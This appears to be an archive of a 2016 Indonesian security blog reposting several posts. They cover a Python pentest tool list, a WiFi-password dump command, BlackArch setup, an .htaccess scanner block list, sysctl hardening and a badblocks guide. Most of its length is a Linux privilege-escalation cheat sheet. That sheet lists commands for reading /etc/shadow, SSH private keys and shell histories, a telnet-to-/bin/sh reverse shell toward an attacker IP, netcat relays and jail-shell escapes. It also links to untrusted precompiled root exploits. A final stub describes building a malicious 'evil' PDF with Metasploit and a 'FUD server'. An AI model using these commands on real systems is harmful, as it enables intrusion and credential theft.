Kamis, 16 Juni 2016

Python tools for penetration testers​

If you are involved in vulnerability research, reverse engineering or penetration testing, I suggest to try out the Pythonprogramming language. It has a rich set of useful libraries and programs. This page lists some of them.
Most of the listed tools are written in Python, others are just Python bindings for existing C libraries, i.e. they make those libraries easily usable from Python programs.
Some of the more aggressive tools (pentest frameworks, bluetooth smashers, web application vulnerability scanners, war-dialers, etc.) are left out, because the legal situation of these tools is still a bit unclear in Germany -- even after the decision of the highest court. This list is clearly meant to help whitehats, and for now I prefer to err on the safe side.
Network
  • ScapyScapy3k: send, sniff and dissect and forge network packets. Usable interactively or as a library
  • pypcapPcapy and pylibpcap: several different Python bindings for libpcap
  • libdnet: low-level networking routines, including interface lookup and Ethernet frame transmission
  • dpkt: fast, simple packet creation/parsing, with definitions for the basic TCP/IP protocols
  • Impacket: craft and decode network packets. Includes support for higher-level protocols such as NMB and SMB
  • pynids: libnids wrapper offering sniffing, IP defragmentation, TCP stream reassembly and port scan detection
  • Dirtbags py-pcap: read pcap files without libpcap
  • flowgrep: grep through packet payloads using regular expressions
  • Knock Subdomain Scan, enumerate subdomains on a target domain through a wordlist
  • SubBrute, fast subdomain enumeration tool
  • Mallory, extensible TCP/UDP man-in-the-middle proxy, supports modifying non-standard protocols on the fly
  • Pytbull: flexible IDS/IPS testing framework (shipped with more than 300 tests)
  • Spoodle: A mass subdomain + poodle vulnerability scanner
  • SMBMap: enumerate Samba share drives across an entire domain
Debugging and reverse engineering
  • Paimei: reverse engineering framework, includes PyDBG, PIDA, pGRAPH
  • Immunity Debugger: scriptable GUI and command line debugger
  • mona.py: PyCommand for Immunity Debugger that replaces and improves on pvefindaddr
  • IDAPython: IDA Pro plugin that integrates the Python programming language, allowing scripts to run in IDA Pro
  • PyEMU: fully scriptable IA-32 emulator, useful for malware analysis
  • pefile: read and work with Portable Executable (aka PE) files
  • pydasm: Python interface to the libdasm x86 disassembling library
  • PyDbgEng: Python wrapper for the Microsoft Windows Debugging Engine
  • uhooker: intercept calls to API calls inside DLLs, and also arbitrary addresses within the executable file in memory
  • diStorm: disassembler library for AMD64, licensed under the BSD license
  • python-ptrace: debugger using ptrace (Linux, BSD and Darwin system call to trace processes) written in Python
  • vdb / vtrace: vtrace is a cross-platform process debugging API implemented in python, and vdb is a debugger which uses it
  • Androguard: reverse engineering and analysis of Android applications
  • Capstone: lightweight multi-platform, multi-architecture disassembly framework with Python bindings
  • Keystone: lightweight multi-platform, multi-architecture assembler framework with Python bindings
  • PyBFD: Python interface to the GNU Binary File Descriptor (BFD) library
  • CHIPSEC: framework for analyzing the security of PC platforms including hardware, system firmware (BIOS/UEFI), and platform components.
Fuzzing
  • afl-python: enables American fuzzy lop fork server and instrumentation for pure-Python code
  • Sulley: fuzzer development and fuzz testing framework consisting of multiple extensible components
  • Peach Fuzzing Platform: extensible fuzzing framework for generation and mutation based fuzzing (v2 was written in Python)
  • antiparser: fuzz testing and fault injection API
  • TAOF, (The Art of Fuzzing) including ProxyFuzz, a man-in-the-middle non-deterministic network fuzzer
  • untidy: general purpose XML fuzzer
  • Powerfuzzer: highly automated and fully customizable web fuzzer (HTTP protocol based application fuzzer)
  • SMUDGE
  • Mistress: probe file formats on the fly and protocols with malformed data, based on pre-defined patterns
  • Fuzzbox: multi-codec media fuzzer
  • Forensic Fuzzing Tools: generate fuzzed files, fuzzed file systems, and file systems containing fuzzed files in order to test the robustness of forensics tools and examination systems
  • Windows IPC Fuzzing Tools: tools used to fuzz applications that use Windows Interprocess Communication mechanisms
  • WSBang: perform automated security testing of SOAP based web services
  • Construct: library for parsing and building of data structures (binary or textual). Define your data structures in a declarative manner
  • fuzzer.py (feliam): simple fuzzer by Felipe Andres Manzano
  • Fusil: Python library used to write fuzzing programs
Web
  • Requests: elegant and simple HTTP library, built for human beings
  • HTTPie: human-friendly cURL-like command line HTTP client
  • ProxMon: processes proxy logs and reports discovered issues
  • WSMap: find web service endpoints and discovery files
  • Twill: browse the Web from a command-line interface. Supports automated Web testing
  • Ghost.py: webkit web client written in Python
  • Windmill: web testing tool designed to let you painlessly automate and debug your web application
  • FunkLoad: functional and load web tester
  • spynner: Programmatic web browsing module for Python with Javascript/AJAX support
  • python-spidermonkey: bridge to the Mozilla SpiderMonkey JavaScript engine; allows for the evaluation and calling of Javascript scripts and functions
  • mitmproxy: SSL-capable, intercepting HTTP proxy. Console interface allows traffic flows to be inspected and edited on the fly
  • pathod / pathoc: pathological daemon/client for tormenting HTTP clients and servers
Forensics
  • Volatility: extract digital artifacts from volatile memory (RAM) samples
  • Rekall: memory analysis framework developed by Google
  • LibForensics: library for developing digital forensics applications
  • TrIDLib, identify file types from their binary signatures. Now includes Python binding
  • aft: Android forensic toolkit
Malware analysis
  • pyew: command line hexadecimal editor and disassembler, mainly to analyze malware
  • Exefilter: filter file formats in e-mails, web pages or files. Detects many common file formats and can remove active content
  • pyClamAV: add virus detection capabilities to your Python software
  • jsunpack-n, generic JavaScript unpacker: emulates browser functionality to detect exploits that target browser and browser plug-in vulnerabilities
  • yara-python: identify and classify malware samples
  • phoneyc: pure Python honeyclient implementation
  • CapTipper: analyse, explore and revive HTTP malicious traffic from PCAP file
PDF
  • peepdf: Python tool to analyse and explore PDF files to find out if they can be harmful
  • Didier Stevens' PDF tools: analyse, identify and create PDF files (includes PDFiDpdf-parser and make-pdf and mPDF)
  • Opaf: Open PDF Analysis Framework. Converts PDF to an XML tree that can be analyzed and modified.
  • Origapy: Python wrapper for the Origami Ruby module which sanitizes PDF files
  • pyPDF2: pure Python PDF toolkit: extract info, spilt, merge, crop, encrypt, decrypt...
  • PDFMiner: extract text from PDF files
  • python-poppler-qt4: Python binding for the Poppler PDF library, including Qt4 support
Misc
  • InlineEgg: toolbox of classes for writing small assembly programs in Python
  • Exomind: framework for building decorated graphs and developing open-source intelligence modules and ideas, centered on social network services, search engines and instant messaging
  • RevHosts: enumerate virtual hosts for a given IP address
  • simplejson: JSON encoder/decoder, e.g. to use Google's AJAX API
  • PyMangle: command line tool and a python library used to create word lists for use with other penetration testing tools
  • Hachoir: view and edit a binary stream field by field
  • py-mangle: command line tool and a python library used to create word lists for use with other penetration testing tools
  • wmiexec.py: execute Powershell commands quickly and easily via WMI
  • Pentestly: Python and Powershell internal penetration testing framework
Other useful libraries and tools
  • IPython: enhanced interactive Python shell with many features for object introspection, system shell access, and its own special command system
  • Beautiful Soup: HTML parser optimized for screen-scraping
  • matplotlib: make 2D plots of arrays
  • Mayavi: 3D scientific data visualization and plotting
  • RTGraph3D: create dynamic graphs in 3D
  • Twisted: event-driven networking engine
  • Suds: lightweight SOAP client for consuming Web Services
  • M2Crypto: most complete OpenSSL wrapper
  • NetworkX: graph library (edges, nodes)
  • Pandas: library providing high-performance, easy-to-use data structures and data analysis tools
  • pyparsing: general parsing module
  • lxml: most feature-rich and easy-to-use library for working with XML and HTML in the Python language
  • Whoosh: fast, featureful full-text indexing and searching library implemented in pure Python
  • Pexpect: control and automate other programs, similar to Don Libes `Expect` system
  • Sikuli, visual technology to search and automate GUIs using screenshots. Scriptable in Jython
  • PyQt and PySide: Python bindings for the Qt application framework and GUI library
Books
Talks, slides and articles
More stuff
source : http://www.n1tr0g3n.com/blog/python-tools-for-penetration-testers
Baca selengkapnya

Display SSID and password of the WIFI network you are currently connected

sudo awk -F= '/^(psk|id)/{print $2}' /etc/NetworkManager/system-connections/"$(iwgetid -r)"

 source : http://ins-cyber.blogspot.com/2016/06/display-ssid-and-password-of-wifi.html
Baca selengkapnya

Kamis, 19 Mei 2016

Menambahkan Repo Blackarch di manjaro dan keluarga Arch linux

BlackArch adalah salah satu distro pentest yang dikembangkan dari distro Arch linux. BlackArch dapat diinstal di atas distro Arch Linux yang ada. Paket dapat dipasang secara individu atau berdasarkan kategori. Repositori terus berkembang saat ini blackarch berisi 1.402 tools pentest.
untuk mendownload Black arch bisa melalui link ini :
BlackArch Linux 64 bit Live ISO torrent
BlackArch Linux 32 bit Live ISO torrent
setelah mendownload blackarch, kita dapat membuat live usbnya menggunakan win32diskimager atau menggunakan dd pada linux
membuat usb instalasi menggunakan linux menggunakan sintax berikut ini :
sudo dd bs=512M if=file.iso of=/dev/sdX
*/sdX = merupakan posisi usb/flashdisk
untuk menginstall blackarch pada distro arch linux, dapat mengunakan cara berikut ini :
# jalankan https://blackarch.org/strap.sh sebagai user root dan ikuti perintahnya.
$ curl -O https://blackarch.org/strap.sh
# Pastikan SHA1sum sesuai
$ sha1sum strap.sh
# seting script agar dapat di eksekusi
$ chmod +x strap.sh
# jalankan strap.sh
$ sudo ./strap.sh
*/Apabila pada saat selesai eksekusi script berikut terjadi error, kita dapat melakukan langkah berikut ini
$ pacman -Syu haveged
$ systemctl start haveged
$ systemctl enable haveged
$ rm -fr /etc/pacman.d/gnupg
$ pacman-key --init
$ pacman-key --populate archlinux
$ pacman-key --populate manjaro
$ pacman-key --populate blackarch
$ pacman -Syu

Anda sekarang dapat menginstal tools dari repositori blackarch
# Untuk melihat semua daftar tools pentest yang ada, jalankan
$ sudo pacman -Sgg | grep blackarch | cut -d' ' -f2 | sort -u
# Untuk menginstall semua tools, jalankan
$ sudo pacman -S blackarch
# Untuk Melihat katagori tools , jalankan
$ sudo pacman -Sg | grep blackarch
# Untuk menginstall per katagori tools, jalankan
$ sudo pacman -S blackarch-<category>

untuk menginstall Blackarch menggunakan live cd/usb dapat menggunakan cara berikut
# Install blackarch-install-scripts package
$ sudo pacman -S blackarch-install-scripts
# kemudian jalankan dan ikuti perintahnya
$ sudo blackarch-install

Default Login blackarch
user : root
Passwrd : blackarch

Baca selengkapnya

Senin, 09 Mei 2016

.htaccess

.htaccess

//save this command on .htaccess
RewriteEngine On
<IfModule mod_rewrite.c>
RewriteCond %{HTTP_USER_AGENT} ^w3af.sourceforge.net [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dirbuster [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nikto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} SF [OR]
RewriteCond %{HTTP_USER_AGENT} sqlmap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} fimap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nessus [NC,OR]
RewriteCond %{HTTP_USER_AGENT} whatweb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Openvas [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jbrofuzz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} libwhisker [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webshag [NC,OR]
RewriteCond %{HTTP:Acunetix-Product} ^WVS
RewriteRule ^.* http://127.0.0.1/ [R=301,L]
</IfModule>
Baca selengkapnya
Harden network with sysctl settings

Harden network with sysctl settings

sudo nano /etc/sysctl.conf
----------------------------------------------------------------------
# IP Spoofing protection
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1

# Ignore ICMP broadcast requests
net.ipv4.icmp_echo_ignore_broadcasts = 1

# Disable source packet routing
net.ipv4.conf.all.accept_source_route = 0
net.ipv6.conf.all.accept_source_route = 0
net.ipv4.conf.default.accept_source_route = 0
net.ipv6.conf.default.accept_source_route = 0

# Ignore send redirects
net.ipv4.conf.all.send_redirects = 0
net.ipv4.conf.default.send_redirects = 0

# Block SYN attacks
net.ipv4.tcp_syncookies = 1
net.ipv4.tcp_max_syn_backlog = 2048
net.ipv4.tcp_synack_retries = 2
net.ipv4.tcp_syn_retries = 5

# Log Martians
net.ipv4.conf.all.log_martians = 1
net.ipv4.icmp_ignore_bogus_error_responses = 1

# Ignore ICMP redirects
net.ipv4.conf.all.accept_redirects = 0
net.ipv6.conf.all.accept_redirects = 0
net.ipv4.conf.default.accept_redirects = 0
net.ipv6.conf.default.accept_redirects = 0

# Ignore Directed pings
net.ipv4.icmp_echo_ignore_all = 1
---------------------------------------------------------
sudo sysctl -p


------[http://www.thefanclub.co.za/how-to/how-secure-ubuntu-1204-lts-server-part-1-basics]------
Baca selengkapnya
Search Music & download with kali linux

Search Music & download with kali linux

I have been editing some videos lately, and its a pain in the ass to get the music of choice. Well it just so happens, my good friend N1tr0g3n found pms.py! Poor-Mans-Spotify. Enjoy!
PMS “Poor Mans Spotify” Python Script Search and stream music, Download Music Works with Windows and Linux
https://github.com/np1/pms
pms
===
- Search and stream music
- Download music
- Works with Python 2.7 and 3
- Works with Windows and Linux (untested with MacOS)
- No Python dependencies
- Requires mplayer
# Installation:
Using pip:
sudo pip install Poor-Mans-Spotify
Using git:
git clone https://github.com/np1/pms.git
Manually:
Download [zip](https://github.com/np1/pms/archive/master.zip)/[tar.gz](https://github.com/np1/pms/archive/master.tar.gz) file and extract
# Usage
usage: pms.py query [query ...]
or simply:
pms.py
# Screenshot
![pms running in terminal](http://i.imgur.com/Oqyz5vk.png “pms running in terminal”)
# Usage Example:
$ > ls
LICENSE pms.py README.md
$ > ./pms.py
Enter artist/song to search : gotye somebody i used to know
Search for ‘gotye somebody i used to know’
Item Size Artist Track Length Bitrate
—- —- —— —– —— ——-
1 3.7 Mb Gotye feat. Kimbra Somebody That I Used 04:04 128
2 9.3 Mb Gotye Somebody That I Used 04:04 320
3 5.5 Mb Gotye Somebody That I Used 04:03 192
4 9.1 Mb Gotye feat. Kimbra Somebody That I Used 04:00 320
5 4.0 Mb Walk off the Earth Somebody That I Used 04:24 128
6 9.1 Mb Gotye feat. Kimbra Somebody That I Used 04:00 320
7 6.3 Mb Gotye feat. Kimbra Somebody That I Used 04:05 VBR
8 6.8 Mb Gotye Somebody That I Used 04:04 VBR
9 9.3 Mb Gotye feat. Kimbra Somebody That I Used 04:03 320
10 5.3 Mb Gotye feat. Kimbra Somebody that I used 04:05 VBR
11 9.5 Mb Gotye ft. Kimbra Somebody That I Used 04:05 VBR
12 7.3 Mb DFM RADIO Gotye feat. Kimbra- S 03:13 320
13 8.0 Mb Somebody That I Used Walk off the Earth (G 04:24 VBR
14 7.4 Mb Gotye Somebody That I Used 04:05 256
15 5.4 Mb Gotye feat. kimbra Somebody that I used 05:55 128
16 5.9 Mb Gotye Feat. Kimbra & Somebody That I Used 03:15 256
17 3.1 Mb Pentatonix Somebody That I Used 03:25 VBR
18 9.2 Mb Gotye feat. Kimbra Somebody That I Used 04:02 320
19 13. Mb Gotye ft. Kimbra Somebody That I Used 05:30 320
20 9.3 Mb Gotye feat Kimbra Somebody That I Used 04:04 320
[1-20] to play or [d 1-20] to download or [q]uit or enter new search
> 3
—————————————————–
Artist : Gotye
Title : Somebody That I Used To Know (feat. Kimbra)
Length : 04:03
Bitrate : 192 Kb/s
Size : 5.594 Mb
—————————————————–
Playing – [q] to quit..


[1-20] to play or [d 1-20] to download or [q]uit or enter new search
> d3

Downloading /f/h/Downloads/PMS/Gotye – Somebody That I Used To Know (.mp3 ..
5,865,433 Bytes [100.00%] received. Rate: [ 734 kbps]. ETA: [0 secs]
Done


[1-20] to play or [d 1-20] to download or [q]uit or enter new search
> avicii
Search for ‘avicii’
Item Size Artist Track Length Bitrate
—- —- —— —– —— ——-
1 9.5 Mb Avicii feat. Aloe Bl Wake Me Up 04:09 320
2 18. Mb Tim Berg Bromance (The Love Yo 08:10 320
3 7.5 Mb Avicii vs Nicky Rome I Could Be The One 05:29 VBR
4 10. Mb Avicii Levels (Skrillex Remi 04:41 320
5 13. Mb Avicii Malo (Alex Gaudino & 06:00 320
6 12. Mb Avicii Levels 05:33 VBR
7 5.8 Mb Sebastien Drums & Av My Feelings For You 06:24 128
8 16. Mb Nadia Ali Rapture (Avicii New G 07:08 320
9 7.7 Mb Tim Berg Seek Bromance (Avicii 03:21 320
10 13. Mb Tim Berg Bromance (Avicii’s Ar 06:00 320
11 12. Mb Avicii Levels (Original Mix) 05:33 VBR
12 6.1 Mb Tim Berg Seek Bromance (Avicii 03:21 256
13 9.7 Mb Avicii Wake Me Up (Radio Edi 04:09 VBR
14 4.5 Mb Avicii Ft Etta James ID (Levels) (Original 03:17 192
15 7.9 Mb Avicii vs. Nicky Rom I Could Be The One (R 03:28 320
16 5.8 Mb Avicii Fade Into Darkness 03:14 VBR
17 9.1 Mb Armin Van Buuren Fea Drowing (Avicii Unnam 04:00 320
18 7.7 Mb Avicii Levels (Radio Edit) 03:21 VBR
19 7.9 Mb Avicii & Nicky Romer I Could Be The One (R 03:12 320
20 13. Mb David Guetta Sunshine (David Guett 06:00 VBR
[1-20] to play or [d 1-20] to download or [q]uit or enter new search
> 3
——————————–
Artist : Avicii vs Nicky Romero
Title : I Could Be The One
Length : 05:29
Bitrate : VBR
Size : 7.534 Mb
——————————–
Playing – [q] to quit..
[1-20] to play or [d 1-20] to download or [q]uit or enter new search
>

sumber http://em3rgency.com/search-dl-music-with-kali-linux/
Baca selengkapnya
cek disk error dan badsector dengan linux

cek disk error dan badsector dengan linux

badblocks is a Linux utility to check for bad sectors on a disk drive (A bad sector is a sector on a computer's disk drive or flash memory that cannot be used due to permanent damage or an OS inability to successfully access it.). It creates a list of these sectors that can be used with other programs, like mkfs, so that they are not used in the future and thus do not cause corruption of data. It is part of the e2fsprogs project.

It can be a good idea to periodically check for bad blocks. This is done with the badblocks command. It outputs a list of the numbers of all bad blocks it can find. This list can be fed to fsck to be recorded in the filesystem data structures so that the operating system won’t try to use the bad blocks for storing data. The following example will show how this could be done.

From the terminal, type following command:
$ sudo badblocks -v /dev/hda1 > bad-blocks
The above command will generate the file bad-blocks in the current directory from where you are running this command.

Now, you can pass this file to the fsck command to record these bad blocks
$ sudo fsck -t ext3 -l bad-blocks /dev/hda1
Pass 1: Checking inodes, blocks, and sizes
Pass 2: Checking directory structure
Pass 3: Checking directory connectivity
Pass 4: Check reference counts.
Pass 5: Checking group summary information.

/dev/hda1: ***** FILE SYSTEM WAS MODIFIED *****

/dev/hda1: 11/360 files, 63/1440 blocks
If badblocks reports a block that was already used, e2fsck will try to move the block to another place. If the block was really bad, not just marginal, the contents of the file may be corrupted.

Read more: http://linuxpoison.blogspot.com/2008/01/howto-check-disk-drive-for-errors-and.html#ixzz2p28WxmQO
Baca selengkapnya
Basic Linux Privilege Escalation

Basic Linux Privilege Escalation

Enumeration is the key.
(Linux) privilege escalation is all about:
  • Collect - Enumeration, more enumeration and some more enumeration.
  • Process - Sort through data, analyse and prioritisation.
  • Search - Know what to search for and where to find the exploit code.
  • Adapt - Customize the exploit, so it fits. Not every exploit work for every system "out of the box".
  • Try - Get ready for (lots of) trial and error.

Operating System

What's the distribution type? What version?
cat /etc/issue
cat /etc/*-release
   cat /etc/lsb-release
   cat /etc/redhat-release


What's the Kernel version? Is it 64-bit?
cat /proc/version  
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-


What can be learnt from the environmental variables?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set


Is there a printer?
lpstat -a


Applications & Services

What services are running? Which service has which user privilege?
ps aux
ps -ef
top
cat /etc/service


Which service(s) are been running by root? Of these services, which are vulnerable - it's worth a double check!
ps aux | grep root
ps -ef | grep root


What applications are installed? What version are they? Are they currently running?
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/


Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/


What jobs are scheduled?
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords?
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"   # Joomla


Communications & Networking

What NIC(s) does the system have? Is it connected to another network?
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network


What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname


What other users & hosts are communicating with the system?
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w


Whats cached? IP and/or MAC addresses
arp -e
route
/sbin/route -nee


Is packet sniffing possible? What can be seen? Listen to live traffic
# tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21


Have you got a shell? Can you interact with the system?
# http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/
nc -lvp 4444    # Attacker. Input (Commands)
nc -lvp 4445    # Attacker. Ouput (Results)
telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445    # On the targets system. Use the attackers IP!


Is port forwarding possible? Redirect and interact with traffic from another view
# rinetd
# http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch

# fpipe
# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7

# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080:127.0.0.1:80 root@192.168.1.7    # Local Port
ssh -R 8080:127.0.0.1:80 root@192.168.1.7    # Remote Port

# mknod backpipe p ; nc -l -p [remote port] < backpipe  | nc [local IP] [local port] >backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe    # Port Relay
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe    # Proxy (Port 80 to 8080)
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe    # Proxy monitor (Port 80 to 8080)


Is tunnelling possible? Send commands locally, remotely
ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig


Confidential Information & Users

Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
id
who
w
last
cat /etc/passwd | cut -d:    # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users
cat /etc/sudoers
sudo -l


What sensitive files can be found?
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/


Anything "interesting" in the home directorie(s)? If it's possible to access
ls -ahlR /root/
ls -ahlR /home/


Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg


What has the user being doing? Is there any password in plain text? What have they been edting?
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history


What user information can be found?
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root


Can private-key information be found?
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key


File Systems

Which configuration files can be written in /etc/? Able to reconfigure a service?
ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null     # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null        # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null    # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null          # Other

find /etc/ -readable -type f 2>/dev/null                         # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null   # Anyone


What can be found in /var/ ?
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases


Any settings/files (hidden) on website? Any settings file with database information?
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/


Is there anything in the log file(s) (Could help with "Local File Includes"!)
# http://www.thegeekstuff.com/2011/08/linux-var-log-files/
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/
# auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp


If commands are limited, you break out of the "jail" shell?
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i


How are file-systems mounted?
mount
df -h


Are there any unmounted file-systems?
cat /etc/fstab


What "Advanced Linux File Permissions" are used? Sticky bits, SUID & GUID
find / -perm -1000 -type d 2>/dev/null    # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the  group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the  owner, not the user who started it.

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)

# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null


Where can written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm
find / -writable -type d 2>/dev/null        # world-writeable folders
find / -perm -222 -type d 2>/dev/null      # world-writeable folders
find / -perm -o+w -type d 2>/dev/null    # world-writeable folders

find / -perm -o+x -type d 2>/dev/null    # world-executable folders

find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null   # world-writeable & executable folders


Any "problem" files? Word-writeable, "nobody" files
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writeable files
find /dir -xdev \( -nouser -o -nogroup \) -print   # Noowner files


Preparation & Finding Exploit Code

What development tools/languages are installed/supported?
find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc


How can files be uploaded?
find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp


Finding exploit code
http://www.exploit-db.com
http://1337day.com
http://www.securiteam.com
http://www.securityfocus.com
http://www.exploitsearch.net
http://metasploit.com/modules/
http://securityreason.com
http://seclists.org/fulldisclosure/
http://www.google.com


Finding more information regarding the exploit
http://www.cvedetails.com
http://packetstormsecurity.org/files/cve/[CVE]
http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]
http://www.vulnview.com/cve-details.php?cvename=[CVE]


(Quick) "Common" exploits. Warning. Pre-compiled binaries files. Use at your own risk
http://tarantula.by.ru/localroot/
http://www.kecepatan*66ghz*com/file/local-root-exploit-priv9/


Mitigations

Is any of the above information easy to find?
Try doing it!
Setup a cron job which automates script(s) and/or 3rd party products


Is the system fully patched? Kernel, operating system, all applications, their  plugins and web services
apt-get update && apt-get upgrade
yum update


Are services running with the minimum level of privileges required?
For example, do you need to run MySQL as root?


Scripts Can any of this be automated?!
http://pentestmonkey.net/tools/unix-privesc-check/
http://labs.portcullis.co.uk/application/enum4linux/
http://bastille-linux.sourceforge.net


Other (quick) guides & Links

Enumeration
http://www.0daysecurity.com/penetration-testing/enumeration.html
http://www.microloft.co.uk/hacking/hacking3.htm


Misc
http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf
http://pentest.cryptocity.net/files/clientsides/post_exploitation_fall09.pdf
http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html

sumber : http://goo.gl/Xddt1u
Baca selengkapnya
pdf evil

pdf evil

Requirements:
Metasploit, a PDF eBook and a FUD server.
Metasploit can be downloaded  http://www.rapid7.com/products/metasploit/download.jsp
Search the web for free eBooks

